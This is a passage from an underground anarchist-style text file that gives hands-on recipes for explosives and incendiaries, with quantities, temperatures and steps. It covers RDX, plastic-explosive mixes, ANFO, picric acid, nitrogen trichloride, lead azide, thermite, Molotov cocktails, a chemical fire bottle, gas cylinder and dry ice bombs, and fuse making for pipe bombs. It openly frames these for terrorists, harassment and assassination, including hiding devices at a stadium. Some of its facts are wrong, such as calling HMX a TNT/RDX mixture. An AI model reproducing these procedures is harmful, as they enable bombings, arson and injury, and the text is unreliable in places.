                       \    /
                        \  /
                         CH
                           2

 R.D.X. can be made by the surprisingly simple method outlined hereafter.  It
is much easier to make in the home than all other high explosives, with the
possible exception of ammonium nitrate.

     MATERIALS                    EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                    ÄÄÄÄÄÄÄÄÄ
     hexamine                     500 ml beaker
       or
     methenamine                  glass stirring rod
     fuel tablets (50 g)
                                  funnel and filter paper
     concentrated
     nitric acid (550 ml)         ice bath container  (plastic bucket)

     distilled water              centigrade thermometer

     table salt                   blue litmus paper

     ice                          ammonium nitrate


1) Place the beaker in the ice bath, (see section 3.13, steps 3-4) and carefully 
   pour 550 ml of concentrated nitric acid into the beaker.

2) When the acid has cooled to below 20 degrees centigrade, add small amounts
   of the crushed fuel tablets to the beaker.  The temperature will rise, and
   it must be kept below 30 degrees centigrade, or dire consequences could
   result. Stir the mixture.

3) Drop the temperature below zero degrees centigrade, either by adding more
   ice and salt to the old ice bath, or by creating a new ice bath.  Or,
   ammonium nitrate could be added to the old ice bath, since it becomes cold
   when it is put in water. Continue stirring the mixture, keeping the
   temperature below zero degrees centigrade for at least twenty minutes

4) Pour the mixture into a litre of crushed ice.  Shake and stir the mixture,
   and allow it to melt.  Once it has melted, filter out the crystals, and
   dispose of the corrosive liquid.

5) Place the crystals into one half a litre of boiling distilled water. Filter
   the crystals, and test them with the blue litmus paper.  Repeat steps 4 and
   5 until the litmus paper remains blue.  This will make the crystals more
   stable and safe.

6) Store the crystals wet until ready for use. Allow them to dry completely
    using them. R.D.X. is not stable enough to use alone as an explosive.

7) Composition C-1 can be made by mixing 88.3% R.D.X. (by weight) with 11.1%
   mineral oil, and 0.6% lecithin. Kneed these material together in a plastic
   bag. This is one way to desensitize the explosive.

8) H.M.X. is a mixture of T.N.T. and R.D.X.; the ratio is 50/50, by weight.   
  it is not as sensitive, and is almost as powerful as straight R.D.X.

9) By adding ammonium nitrate to the crystals of R.D.X. after step 5, it
   should be possible to desensitize the R.D.X. and increase its power, since
   ammonium nitrate is very insensitive and powerful. Soduim or potassium
   nitrate could also be added; a small quantity is sufficient to stabilize
   the R.D.X.

10) R.D.X. detonates at a rate of 8550 meters/second when it is compressed to a  
   density of 1.55 g/cubic cm.

3.32      AMMONIUM NITRATE

     Ammonium nitrate could be made by a terrorist according to the haphazard
method in section 2.33, or it could be stolen from a construction site, since
it is usually used in blasting, because it is very stable and insensitive to
shock and heat.  A terrorist could also buy several Instant Cold-Paks from a
drug store or medical supply store.  The major disadvantage with ammonium
nitrate, from a terrorist's point of view, would be detonating it.  A rather
powerful priming charge must be used, and usually with a booster charge.  The
diagram below will explain.

(Ill. 3.32)
          _________________________________________
          |       |__                             |
  ________|_        |                             |
  |        | T.N.T. |    ammonium nitrate         |
  |primer  |booster |         +                   |
  |________|        |     fuel oil                |
          |       __|                             |
          |_______|_______________________________|

     The primer explodes, detonating the T.N.T., which detonates, sending
a tremendous shockwave through the ammonium nitrate, detonating it.


3.33     ANFOS

     ANFO is an acronym for Ammonium Nitrate - Fuel Oil Solution.  An ANFO
solves the only other major problem with ammonium nitrate: its tendency to
pick up water vapor from the air.  This results in the explosive failing to
detonate when such an attempt is made.  This is rectified by mixing 94% (by
weight) ammonium nitrate with 6% fuel oil, or kerosene.  The kerosene keeps
the ammonium nitrate from absorbing moisture from the air.  An ANFO also
requires a large shockwave to set it off.


3.33.1     About ANFO            (From Dean S.)

  Lately there was been a lot said about various ANFO mixtures.  These are
mixtures of Ammonium Nitrate with Fuel Oil.  This forms a reasonably powerful
commercial explosive, with its primary benifit being the fact that it is
cheap.  Bulk ANFO should run somewhere around 9-12 cents the pound. This is
dirt cheap compared to 40% nitro gel dynamites at 1 to 2 dollars the pound. To
keep the cost down, it is frequently mixed at the borehole by a bulk truck,
which has a pneumatic delivery hopper of AN prills (thats pellets to most of
the world) and a tank of fuel oil.  It is strongly recommended that a dye of
some sort, preferably red be added to the fuel oil to make it easier to
distinguish treated AN explosive from untreated oxidizer.

   ANFO is not without its problems.  To begin with, it is not that sensitive
to detonation.  Number eight caps are not reliable when used with ANFO.
Booster charges must be used to avoid dud blast holes.  Common boosters
include sticks of various dynamites, small pours of water gel explosives,
dupont's detaprime cast boosters, and Atlas's power primer cast explosive. The
need to use boosters raises the cost.  Secondly, ANFO is very water
susceptable.  It dissolves in it, or absorbes it from the atmosphere, and
becomes quite worthless real quick.  It must be protected from water with
borehole liners, and still must be shot real quick.  Third, ANFO has a low
density, somewhere around .85.  This means ANFO sacks float, which is no good,
and additionally, the low density means the power is somewhat low. Generally,
the more weight of explosive one can place in a hole, the more effective.
ANFO blown into the hole with a pneumatic system fractures as it is places,
raising the density to about .9 or .92.  The delivery system adds to the cost,
and must be anti static in nature.  Aluminum is added to some commercial,
cartridge packaged ANFOs to raise the density---this also raises power
considerable, and a few of these mixtures are reliablly cap sensitive.

  Now than, for formulations.  An earlier article mentioned 2.5 kilos of
ammonium nitrate, and I believe 5 to 6 liters of diesel.  This mixture is
extremely over fueled, and I'd be surprised if it worked.  Dupont recommends a
AN to FO ratio of 93% AN to 7% FO by weight.  Hardly any oil at all.  More oil
makes the mixture less explosive by absorbing detonation energy, and excess
fuel makes detonation byproducts health hazzards as the mixture is oxygen
poor.  Note that commercial fertilizer products do not work as well as the
porous AN prills dupont sells, because fertilizers are coated with various
materials meant to seal them from moisture, which keep the oil from being
absorbed.

   Another problem with ANFO:  for reliable detonation, it needs confinement,
either from a casing, borehole, etc, or from the mass of the charge.  Thus, a
pile of the stuff with a booster in it is likely to scatter and burn rather
than explode when the booster is shot.  In boreholes, or reasonable strong
casings (cardboard, or heavy plastic film sacks) the stuff detonated quite
well.  So will big piles.  Thats how the explosive potential was discovered: a
small oil freighter rammed a bulk chemical ship.  Over several hours the
cargoes intermixed to some degree, and reached critical mass.  Real big bang.
A useful way to obtain the containment needed is to replace the fuel oil with
a wax fuel.  Mix the AN with just enough melted wax to form a cohesive
mixture, mold into shape.  The wax fuels, and retains the mixture. This is
what the US military uses as a man placed cratering charge.  The military
literature states this can be set off by a blasting cap, but it is important
to remember the military blasting caps are considerable more powerful than
commercial ones.  The military rightly insists on reliability, and thus a
strong cap (maybe 70-80 percent stronger than commercial).  They also tend to
go overboard when calculating demolition charges...., but then hey, who
doesn't....

   Two manuals of interest:  Duponts "Blaster's Handbook", a $20 manual mainly
useful for rock and seismographic operations.  Atlas's "Powder Manual" or
"Manual of Rock Blasting" (I forget the title, its in the office).  This is a
$60 book, well worth the cash, dealing with the above two topics, plus
demolitions, and non-quarry blasting.

    Incidently, combining fuel oil and ammonium nitrate constitutes the
manufacture of a high explosive, and requires a federal permit to manufacture
and store. Even the mines that mix it on site require the permit to
manufacture.  Those who don't manufacture only need permits to store.  Those
who don't store need no permits, which includes most of us:  anyone, at least
in the US may purchase explosives, provided they are 21 or older, and have no
criminal record.  Note they ought to be used immediately, because you do need
a liscence to store. Note also that commercial explosives contain quantities
of tracing agents, which make it real easy for the FBI to trace the explosion
to the purchaser, so please, nobody blow up any banks, orphanages, or old
folks homes, okay.

                              D. S.- Civil Engineer at large.


3.34       T.N.T.

     T.N.T., or Tri-Nitro-Toluene, is perhaps the second oldest known high
explosive. Dynamite, of course, was the first. It is certainly the best known
high explosive, since it has been popularized by early morning cartoons. It is
the standard for comparing other explosives to, since it is the most well
known. In industry, a T.N.T. is made by a three step nitration process that is
designed to conserve the nitric and sulfuric acids which are used to make the
product. A terrorist, however, would probably opt for the less economical one
step method. The one step process is performed by treating toluene with very
strong (fuming) sulfuric acid. Then, the sulfated toluene is treated with very
strong (fuming) nitric acid in an ice bath. Cold water is added the solution,
and it is filtered.


3.35     POTASSIUM CHLORATE

     Potassium chlorate itself cannot be made in the home, but it can be
obtained from labs.  If potassium chlorate is mixed with a small amount of
vaseline, or other petroleum jelly, and a shockwave is passed through it, the
material will detonate with slightly more power than black powder.  It must,
however, be confined to detonate it in this manner.  The procedure for making
such an explosive is outlined below:

     MATERIALS                    EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                    ÄÄÄÄÄÄÄÄÄ
     potassium chlorate           zip-lock plastic bag
     (9 parts, by volume)

     petroleum jelly              clay grinding bowl
     (vaseline)                          or
     (1 part, by volume)          wooden bowl and wooden spoon

1) Grind the potassium chlorate in the grinding bowl carefully and slowly,
   until the potassium chlorate is a very fine powder.  The finer that it is
   powdered, the faster (better)  it will detonate.

2) Place the powder into the plastic bag.  Put the petroleum jelly into the
   plastic bag, getting as little on the sides of the bag as possible, i.e.
   put the vaseline on the potassium chlorate powder.

3) Close the bag, and kneed the materials together until none of the potassium
   chlorate is dry powder that does not stick to the main glob.  If necessary,
   add a bit more petroleum jelly to the bag.

4) The material must me used within 24 hours, or the mixture will react to
   greatly reduce the effectiveness of the explosive.  This reaction, however,
   is harmless, and releases no heat or dangerous products.


3.36     DYNAMITE

     The name dynamite comes from the Greek word "dynamis", meaning power.
Dynamite was invented by Nobel shortly after he made nitroglycerine. It was
made because nitroglycerine was so dangerously sensitive to shock. A misguided
individual with some sanity would, after making nitroglycerine (an insane act)
would immediately convert it to dynamite. This can be done by adding various
materials to the nitroglycerine, such as sawdust. The sawdust holds a large
weight of nitroglycerine per volume. Other materials, such as ammonium nitrate
could be added, and they would tend to desensitize the explosive, and increase
the power.  But even these nitroglycerine compounds are not really safe.

3.37     NITROSTARCH EXPLOSIVES

     Nitrostarch explosives are simple to make, and are fairly powerful.  All
that need be done is treat various starches with a mixture of concentrated
nitric and sulfuric acids.  10 ml of concentrated sulfuric acid is added to 10
ml of concentrated nitric acid.  To this mixture is added 0.5 grams of starch.
Cold water is added, and the apparently unchanged nitrostarch is filtered out.
Nitrostarch explosives are of slightly lower power than T.N.T., but they are
more readily detonated.


3.38     PICRIC ACID

     Picric acid, also known as Tri-Nitro-Phenol, or T.N.P., is a military
explosive that is most often used as a booster charge to set off another less
sensitive explosive, such as T.N.T.  It another explosive that is fairly
simple to make, assuming that one can acquire the concentrated sulfuric and
nitric acids.  Its procedure for manufacture is given in many college
chemistry lab manuals, and is easy to follow.  The main problem with picric
acid is its tendency to form dangerously sensitive and unstable picrate salts,
such as potassium picrate.  For this reason, it is usually made into a safer
form, such as ammonium picrate, also called explosive D.  A social deviant
would probably use a formula similar to the one presented here to make picric
acid.

     MATERIALS                         EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                         ÄÄÄÄÄÄÄÄÄ
     phenol (9.5 g)                    500 ml flask

     concentrated                      adjustable heat source
     sulfuric acid  (12.5 ml)
                                       1000 ml beaker
     concentrated nitric               or other container
     acid (38 ml)                      suitable for boiling in

     distilled water                   filter paper
                                       and funnel

                                       glass stirring rod


1) Place 9.5 grams of phenol into the 500 ml flask, and carefully add 12.5 ml
   of concentrated sulfuric acid and stir the mixture.

2) Put 400 ml of tap water into the 1000 ml beaker or boiling container and
   bring the water to a gentle boil.

3) After warming the 500 ml flask under hot tap water, place it in the boiling
   water, and continue to stir the mixture of phenol and acid for about thirty
   minutes.  After thirty minutes, take the flask out, and allow it to cool
   for about five minutes.

4) Pour out the boiling water used above, and after allowing the container to
   cool, use it to create an ice bath, similar to the one used in section
   3.13, steps 3-4.  Place the 500 ml flask with the mixed acid an phenol in
   the ice bath.  Add 38 ml of concentrated nitric acid in small amounts,
   stirring the mixture constantly.  A vigorous but "harmless" reaction should
   occur.  When the mixture stops reacting vigorously, take the flask out of
   the ice bath.

5) Warm the ice bath container, if it is glass, and then begin boiling more
   tap water.  Place the flask containing the mixture in the boiling water,
   and heat it in the boiling water for 1.5 to 2 hours.

6) Add 100 ml of cold distilled water to the solution, and chill it in an ice
   bath until it is cold.

7) Filter out the yellowish-white picric acid crystals by pouring the solution
   through the filter paper in the funnel.  Collect the liquid and dispose of
   it in a safe place, since it is corrosive.

8) Wash out the 500 ml flask with distilled water, and put the contents of the
   filter paper in the flask.  Add 300 ml of water, and shake vigorously.

9) Re-filter the crystals, and allow them to dry.

10) Store the crystals in a safe place in a glass container, since they will
    react with metal containers to produce picrates that could explode
    spontaneously.


3.39     AMMONIUM PICRATE

     Ammonium picrate, also called Explosive D, is another safety explosive.
It requires a substantial shock to cause it to detonate, slightly less than
that required to detonate ammonium nitrate.  It is much safer than picric
acid, since it has little tendency to form hazardous unstable salts when
placed in metal containers.  It is simple to make from picric acid and clear
household ammonia. All that need be done is put the picric acid crystals into
a glass container and dissolve them in a great quantity of hot water.  Add
clear household ammonia in excess, and allow the excess ammonia to evaporate.
The powder remaining should be ammonium picrate.


3.40   NITROGEN TRICHLORIDE

     Nitrogen trichloride, also known as chloride of azode, is an oily yellow
liquid.  It explodes violently when it is heated above 60 degrees celsius, or
when it comes in contact with an open flame or spark.  It is fairly simple to
produce.

1) In a beaker, dissolve about 5 teaspoons of ammonium nitrate in water. Do
   not put so much ammonium nitrate into the solution that some of it remains
   undissolved in the bottom of the beaker.

2) Collect a quantity of chlorine gas in a second beaker by mixing
   hydrochloric acid with potassium permanganate in a large flask with a
   stopper and glass pipe.

3)  Place the beaker containing the chlorine gas upside down on top of the
    beaker containing the ammonium nitrate solution, and tape the beakers
    together.  Gently heat the bottom beaker.  When this is done, oily yellow
    droplets will begin to form on the surface of the solution, and sink down
    to the bottom.  At this time, remove the heat source immediately.

  Alternately, the chlorine can be bubbled through the ammonium nitrate
solution, rather than collecting the gas in a beaker, but this requires timing
and a stand to hold the beaker and test tube.

    The chlorine gas can also be mixed with anhydrous ammonia gas, by gently
heating a flask filled with clear household ammonia.  Place the glass tubes
from the chlorine-generating flask and the tube from the ammonia-generating
flask in another flask that contains water.

4) Collect the yellow droplets with an eyedropper, and use them immediately,
   since nitrogen trichloride decomposes in 24 hours.


3.41     LEAD AZIDE

     Lead Azide is a material that is often used as a booster charge for other
explosive, but it does well enough on its own as a fairly sensitive explosive.
It does not detonate too easily by percussion or impact, but it is easily
detonated by heat from an igniter wire, or a blasting cap.  It is simple to
produce, assuming that the necessary chemicals can be procured.

   By dissolving sodium azide and lead acetate in water in separate beakers,
the two materials are put into an aqueous state.  Mix the two beakers
together, and apply a gentle heat. Add an excess of the lead acetate solution,
until no reaction occurs, and the precipitate on the bottom of the beaker
stops forming.

   Filter off the solution, and wash the precipitate in hot water. The
precipitate is lead azide, and it must be stored wet for safety. If lead
acetate cannot be found, simply acquire acetic acid, and put lead metal in it.
Black powder bullets work well for this purpose.

3.5     OTHER "EXPLOSIVES"

     The remaining section covers the other types of materials that can be
used to destroy property by fire.  Although none of the materials presented
here are explosives, they still produce explosive-style results.

3.51     THERMITE

     Thermite is a fuel-oxodizer mixture that is used to generate tremendous
amounts of heat. It was not presented in section 3.23 because it does not
react nearly as readily. It is a mixture of iron oxide and aluminum, both
finely powdered. When it is ignited, the aluminum burns, and extracts the
oxygen from the iron oxide. This is really two very exothermic reactions that
produce a combined temperature of about 2200 degrees C. This is half the heat
energy produced by an atomic weapon. It is difficult to ignite, however, but
when it is ignited, it is one of the most effective firestarters around.

     MATERIALS
     ÄÄÄÄÄÄÄÄÄ
     powdered aluminum (10 g)       powdered iron oxide (10 g)

1) There is no special procedure or equipment required to make thermite.
   Simply mix the two powders together, and try to make the mixture as
   homogenous as possible.  The ratio of iron oxide to aluminum is 50% / 50%
   by weight, and be made in greater or lesser amounts.


2) Ignition of thermite can be accomplished by adding a small amount of
   potassium chlorate to the thermite, and pouring a few drops of sulfuric
   acid on it.  This method and others will be discussed later in section
   4.33.  The other method of igniting thermite is with a magnesium strip.
   Finally, by using common sparkler-type fireworks placed in the thermit, the
   mixture can be ignited.


3.52     MOLOTOV COCKTAILS

     First used by Russians against German tanks, the Molotov cocktail is now
exclusively used by terrorists worldwide. They are extremely simple to make,
and can produce devastating results. By taking any highly flammable material,
such as gasoline, diesel fuel, kerosene, ethyl or methyl alcohol, lighter
fluid, turpentine, or any mixture of the above, and putting it into a large
glass bottle, anyone can make an effective firebomb. After putting the
flammable liquid in the bottle, simply put a piece of cloth that is soaked in
the liquid in the top of the bottle so that it fits tightly.

 Then, wrap some of the cloth around the neck and tie it, but be sure to leave
a few inches of lose cloth to light. Light the exposed cloth, and throw the
bottle. If the burning cloth does not go out, and if the bottle breaks on
impact, the contents of the bottle will spatter over a large area near the
site of impact, and burst into flame.

Flammable mixtures such as kerosene and motor oil should be mixed with a more
volatile and flammable liquid, such as gasoline, to insure ignition. A mixture
such as tar or grease and gasoline will stick to the surface that it strikes,
and burn hotter, and be more difficult to extinguish. A mixture such as this
must be shaken well before it is lit and thrown


3.53     CHEMICAL FIRE BOTTLE

     The chemical fire bottle is really an advanced molotov cocktail.  Rather
than using the burning cloth to ignite the flammable liquid, which has at best
a fair chance of igniting the liquid, the chemical fire bottle utilizes the
very hot and violent reaction between sulfuric acid and potassium chlorate.
When the container breaks, the sulfuric acid in the mixture of gasoline sprays
onto the paper soaked in potassium chlorate and sugar.  The paper, when struck
by the acid, instantly bursts into a white flame, igniting the gasoline.  The
chance of failure to ignite the gasoline is less than 2%, and can be reduced
to 0%, if there is enough potassium chlorate and sugar to spare.


     MATERIALS                         EQUIPMENT
     ÄÄÄÄÄÄÄÄÄ                         ÄÄÄÄÄÄÄÄÄ
     potassium chlorate               12 oz.glass bottle
     (2 teaspoons)

     sugar (2 teaspoons)              cap for bottle, w/plastic inside               

     conc. sulfuric acid (4 oz.)      cooking pan with raised edges

     gasoline (8 oz.)                 paper towels

                                      glass or plastic cup and spoon

1) Test the cap of the bottle with a few drops of sulfuric acid to make sure
   that the acid will not eat away the bottle cap during storage.  If the acid
   eats through it in 24 hours, a new top must be found and tested, until  a
   cap that the acid does not eat through is found.  A glass top is excellent.

2) Carefully pour 8 oz. of gasoline into the glass bottle.

3) Carefully pour 4 oz. of concentrated sulfuric acid into the glass bottle.
   Wipe up any spills of acid on the sides of the bottle, and screw the cap on
   the bottle.  Wash the bottle's outside with plenty of water.  Set it aside
   to dry.

4) Put about two teaspoons of potassium chlorate and about two teaspoons of
   sugar into the glass or plastic cup.  Add about 1/2 cup of boiling water,
   or enough to dissolve all of the potassium chlorate and sugar.

5) Place a sheet of paper towel in the cooking pan with raised edges.  Fold
   the paper towel in half, and pour the solution of dissolved potassium
   chlorate and sugar on it until it is thoroughly wet.  Allow the towel to
   dry.

6) When it is dry, put some glue on the outside of the glass bottle containing
   the gasoline and sulfuric acid mixture.  Wrap the paper towel around the
   bottle, making sure that it sticks to it in all places.  Store the bottle
   in a place where it will not be broken or tipped over.

7) When finished, the solution in the bottle should appear as two distinct
   liquids, a dark brownish-red solution on the bottom, and a clear solution
   on top.  The two solutions will not mix.  To use the chemical fire bottle,
   simply throw it at any hard surface.

8) NEVER OPEN THE BOTTLE, SINCE SOME SULFURIC ACID MIGHT BE ON THE CAP, WHICH
   COULD TRICKLE DOWN THE SIDE OF THE BOTTLE AND IGNITE THE POTASSIUM
   CHLORATE, CAUSING A FIRE AND/OR EXPLOSION.

9) To test the device, tear a small piece of the paper towel off the bottle,
   and put a few drops of sulfuric acid on it.  The paper towel should
   immediately burst into a white flame.


3.54     BOTTLED GAS EXPLOSIVES

     Bottled gas, such as butane for refilling lighters, propane for propane
stoves or for bunsen burners, can be used to produce a powerful explosion. To
make such a device, all that a simple-minded anarchist would have to do would
be to take his container of bottled gas and place it above a can of Sterno or
other gelatinized fuel, light the fuel and run. Depending on the fuel used,
and on the thickness of the fuel container, the liquid gas will boil and
expand to the point of bursting the container in about five minutes.

 In theory, the gas would immediately be ignited by the burning gelatinized
fuel, producing a large fireball and explosion. Unfortunately, the bursting of
the bottled gas container often puts out the fuel, thus preventing the
expanding gas from igniting.  By using a metal bucket half filled with
gasoline, however, the chances of ignition are better, since the gasoline is
less likely to be extinguished.  Placing the canister of bottled gas on a bed
of burning charcoal soaked in gasoline would probably be the most effective
way of securing ignition of the expanding gas, since although the bursting of
the gas container may blow out the flame of the gasoline, the burning charcoal
should immediately re-ignite it.  Nitrous oxide, hydrogen, propane, acetylene,
or any other flammable gas will do nicely.

  During the recent gulf war, fuel/air bombs were touted as being second only
to nuclear weapons in their devastating effects. These are basically similar
to the above devices, except that an explosive charge is used to rupture the
fuel container and disperse it over a wide area. a second charge is used to
detonate the fuel. The reaction is said to produce a massive shockwave and to
burn all the oxygen in a large area, causing suffocation.

  Another benefit of a fuel-air explosive is that the gas will seep into
fortified bunkers and other partially-sealed spaces, so a large bomb placed in
a building would result in the destruction of the majority of surrounding
rooms, rendering it structurally unsound.


3.6   Fun with dry ice... LOTS of fun with dry ice.  (from the Usenet.)

   There is no standard formula for a dry ice bomb, however a generic form is
as follows:

Take a 2-liter soda bottle, empty it completely, then add about 3/4 Lb of
Dry Ice (crushed works best) and (optional) a quantity of water.

   Depending on the condition of the bottle, the weather, and the amount and
temperature of the bottle the bomb will go off in 30 seconds - 5 minutes.
Without any water added, the 2-liter bottles will go often in 3-7 minutes if
dropped into a warm river, and in 45 minutes to 1 1/2 hours in open air.

   The explosion sounds equivalent to an M-100. _Plastic_ 16 oz. soda bottles
and 1 liter bottles work almost as well as do the 2-liters, however glass
bottles aren't nearly as loud, and can produce dangerous shrapnel.

   Remember, these are LOUD! Dorian, a classmate of mine, set up 10 bottles
in a nearby park without adding water. After the first two went off (there
was about 10 minutes between explosions) the Police arrived and spent the
next hour trying to find the guy who they thought was setting off M-100's
all around them...

USES FOR DRY ICE

Time Bombs:

1.   Get a small plastic container with lid (we used the small plastic  cans
  that hold the coaters used for large-format Polaroid film). A  film canister
  would probably work; the key is, it should seal tightly  and take a fair
  amount of effort to open).
     Place a chunk of dry ice in the can, put on the lid without quite
  sealing it. Put the assembled bomb in your pocket, or behind your  back.
     Approach the mark and engage in normal conversation. When his  attention
  is drawn away, quickly seal the lid on the bomb, deposit it  somewhere
  within a few feet of the mark, out of obvious sight, then  leave.
      Depending on variables (you'll want to experiment first), you'll hear  a
  loud "pop" and an even louder "Aarrggghhh!" within a minute, when  the CO2
  pressure becomes sufficient to blow off the lid.
     In a cluttered lab, this is doubly nasty because the mark will  proabably
  never figure out what made the noise.

2.  Put 2-3 inches of water in a 2-liter plastic pop bottle.  Put in  as many
  chunks of dry ice as possible before the smoke gets too thick.  Screw on the
  cap, place in an appropriate area, and run like hell.  After about a minute
  (your mileage may vary), a huge explosion will  result, spraying water
  everywhere, along with what's left of the 2-liter bottle.

More things to do with Dry Ice:

   Has anyone ever thrown dry ice into a public pool?  As long as you chuck it
into the bottom of the deep end, it's safe, and it's really impressive if the
water is warm enough

     "Fun stuff. It SCREAMS when it comes into contact with metal..."
      "You can safely hold a small piece of dry ice in your mouth if you  KEEP
IT MOVING CONSTANTLY. It looks like you're smoking or on fire."

       Editor's Note:   Dry ice can be a lot of fun, but be forewarned:

    Using anything but plastic to contain dry ice bombs is suicidal.  Dry ice
is more dangerous than TNT, because it's extremely unpredictable.  Even a
2-liter bottle can produce some nasty shrapnel:  One source tells me that he
caused an explosion with a 2-liter bottle that destroyed a metal garbage can.
In addition, it is rumored that several kids have been killed by shards of
glass resulting from the use of a glass bottle. For some reason, dry ice bombs
have become very popular in the state of Utah. As a result, dry ice bombs have
been classified as infernal devices, and possession is a criminal offense.


4.0     USING EXPLOSIVES

     Once a terrorist has made his explosives, the next logical step is to
apply them. Explosives have a wide range of uses, from harassment, to
vandalism, to assassination. NONE OF THE IDEAS PRESENTED HERE ARE EVER TO BE
CARRIED OUT, EITHER IN PART OR IN FULL!  DOING SO CAN LEAD TO PROSECUTION,
FINES, AND IMPRISONMENT! The first step that a person that would use explosive
would take would be to determine how big an explosive device would be needed
to do whatever had to be done. Then, he would have to decide what to make his
bomb with. He would also have to decide on how he wanted to detonate the
device, and determine where the best placement for it would be. Then, it would
be necessary to see if the device could be put where he wanted it without it
being discovered or moved. Finally, he would actually have to sit down and
build his explosive device. These are some of the topics covered in the next
section.

4.1     SAFETY

     There is no such thing as a "safe" explosive device.  One can only speak
in terms of relative safety, or less unsafe.


4.11    HOW NOT TO GET KILLED   (Ways to avoid scoring an "Own Goal")

        An "own goal" is the death of a person on your side from one of
your own devices. It is obvious that these should be avoided at all
costs. While no safety device is 100% reliable, it is usually better to
err on the side of caution.

                           BASIC SAFETY RULES

1) DON'T SMOKE!  (don't laugh- an errant cigarette wiped out the Weathermen)
2) GRIND ALL INGREDIENTS SEPERATELY. It's suprising how friction sensitive
    some supposedly "safe" explosives really are.
3) ALLOW for a 20% margin of error- Just because the AVERAGE burning rate of a
    fuse is 30 secs/foot, don't depend on the 5 inches sticking out of your
    pipe bomb to take exactly 2.5 minutes.
4) OVERESTIMATE THE RANGE OF YOUR SHRAPNEL. The cap from a pipe bomb can
    oftentravel a block or more at high velocities before coming to rest- If
    you have to stay nearby, remember that if you can see it, it can kill you.
5) When mixing sensitive compounds (such as flash powder) avoid all sources of
   static electricity. Mix the ingredients by the method below:

4.12   HOW TO MIX INGREDIENTS

     The best way to mix two dry chemicals to form an explosive is to do as
the small-scale fireworks manufacturer's do:

Ingredients:

1 large sheet of smooth paper (for example a page from a newspaper that does
    not use staples)

The dry chemicals needed for the desired compound.

1) Measure out the appropriate amounts of the two chemicals, and pour them in
    two small heaps near opposite corners of the sheet.
2) Pick up the sheet by the two corners near the powders, allowing the powders
    to  roll towards the middle of the sheet.
3) By raising one corner and then the other, roll the powders back and forth
    in the middle of the open sheet, taking care not to let the mixture spill
    from either of the loose ends.
4) Pour the powder off from the middle of the sheet, and use immediately. If
    it must be stored use airtight containers (35mm film canisters work
    nicely) and store away from people, houses, and valuable items.

4.2     IGNITION DEVICES

     There are many ways to ignite explosive devices.  There is the classic
"light the fuse, throw the bomb, and run" approach, and there are sensitive
mercury switches, and many things in between.  Generally, electrical
detonation systems are safer than fuses, but there are times when fuses are
more appropriate than electrical systems; it is difficult to carry an
electrical detonation system into a stadium, for instance, without being
caught.  A device with a fuse or impact detonating fuze would be easier to
hide.

4.21     FUSE IGNITION

     The oldest form of explosive ignition, fuses are perhaps the favorite
type of simple ignition system.  By simply placing a piece of waterproof fuse
in a device, one can have almost guaranteed ignition.  Modern waterproof fuse
is extremely reliable, burning at a rate of about 2.5 seconds to the inch.  It
is available as model rocketry fuse in most hobby shops, and costs about $3.00
for a nine-foot length.  Cannon Fuse is a popular ignition system for pipe
bombers because of its simplicity.  All that need be done is light it with a
match or lighter. Of course, if the Army had fuses like this, then the
grenade, which uses fuse ignition, would be very impracticle.  If a grenade
ignition system can be acquired, by all means, it is the most effective.  But,
since such things do not just float around, the next best thing is to prepare
a fuse system which does not require the use of a match or lighter, but still
retains its simplicity. One such method is described below:


     MATERIALS
     _________
     strike-on-cover type matches       electrical tape or duct tape
     waterproof fuse

1) To determine the burn rate of a particular type of fuse, simply measure a 6
   inch or longer piece of fuse and ignite it.  With a stopwatch, press the
   start button the at the instant when the fuse lights, and stop the watch
   when the fuse reaches its end.  Divide the time of burn by the length of
   fuse, and you have the burn rate of the fuse, in seconds per inch.  This
   will be shown below:

     Suppose an eight inch piece of fuse is burned, and its complete time of
    combustion is 20 seconds.

     20 seconds / 8 inches = 2.5 seconds per inch.

     If a delay of 10 seconds was desired with this fuse, divide the desired
     time by the number of seconds per inch:

     10 seconds / 2.5 seconds per inch  = 4 inches

NOTE: THE LENGTH OF FUSE HERE MEANS LENGTH OF FUSE TO THE POWDER.  SOME FUSE,
  AT LEAST AN INCH, SHOULD BE INSIDE THE DEVICE.  ALWAYS ADD THIS EXTRA INCH,
  AND PUT THIS EXTRA INCH AN INCH INTO THE DEVICE!!!

2) After deciding how long a delay is desired before the explosive device is
   to go off, add about 1/2 an inch to the premeasured amount of fuse, and cut
   it off.

3) Carefully remove the cardboard matches from the paper match case.  Do not
   pull off individual matches; keep all the matches attached to the cardboard
   base.  Take one of the cardboard match sections, and leave the other one to
   make a second igniter.

4) Wrap the matches around the end of the fuse, with the heads of the matches
   touching the very end of the fuse.  Tape them there securely, making sure
   not to put tape over the match heads.  Make sure they are very secure by
   pulling on them at the base of the assembly.  They should not be able to
   move.

5) Wrap the cover of the matches around the matches attached to the fuse,
   making sure that the striker paper is below the match heads and the striker
   faces the match heads.  Tape the paper so that is fairly tight around the
   matches. Do not tape the cover of the striker to the fuse or to the
   matches. Leave enough of the match book to pull on for ignition.

(Ill. 4.21)
          _____________________
          \                   /
           \                 /  ------ match book cover
            \               /
             |    M|f|M ---|------- match head
             |    A|u|A    |
             |    T|s|T    |
             |    C|e|C    |
             |tapeH|.|Htape|
             |     |f|     |
             |#####|u|#####|-------- striking paper
             |#####|s|#####|
             \     |e|     /
              \    |.|    /
               \   |f|   /
                \  |u|  /
                |ta|s|pe|
                |ta|e|pe|
                   |.|
                   |f|
                   |u|
                   |s|
                   |e|
                   |.|
                   |_|

     The match book is wrapped around the matches, and is taped to itself.     
The matches are taped to the fuse.  The striker will rub against the     
matcheads when the match book is pulled.

6) When ready to use, simply pull on the match paper.  It should pull the
   striking paper across the match heads with enough friction to light them.
   In turn, the burning matcheads will light the fuse, since it adjacent to
   the burning match heads.


4.21.1              HOW TO MAKE BLACKMATCH FUSE:

  Take a flat piece of plastic or metal (brass or aluminum are easy to work
with and won't rust).  Drill a 1/16th inch hole through it.  This is your die
for sizing the fuse.  You can make fuses as big as you want, but this is the
right size for the pipe bomb I will be getting to later.

   To about 1/2 cup of black powder add water to make a thin paste.  Add 1/2
teaspoon of corn starch. Cut some one foot lengths of cotton thread.  Use
cotton, not silk or thread made from synthetic fibers.  Put these together
until you have a thickness that fills the hole in the die but can be drawn
through very easily.

  Tie your bundle of threads together at one end. Separate the threads and
hold the bundle over the black powder mixture. Lower the threads with a
circular motion so they start curling onto the mixture.  Press them under with
the back of a teaspoon and continue lowering them so they coil into the paste.
Take the end you are holding and thread it through the die.  Pull it through
smoothly in one long motion.

  To dry your fuse, lay it on a piece of aluminum foil and bake it in your 250
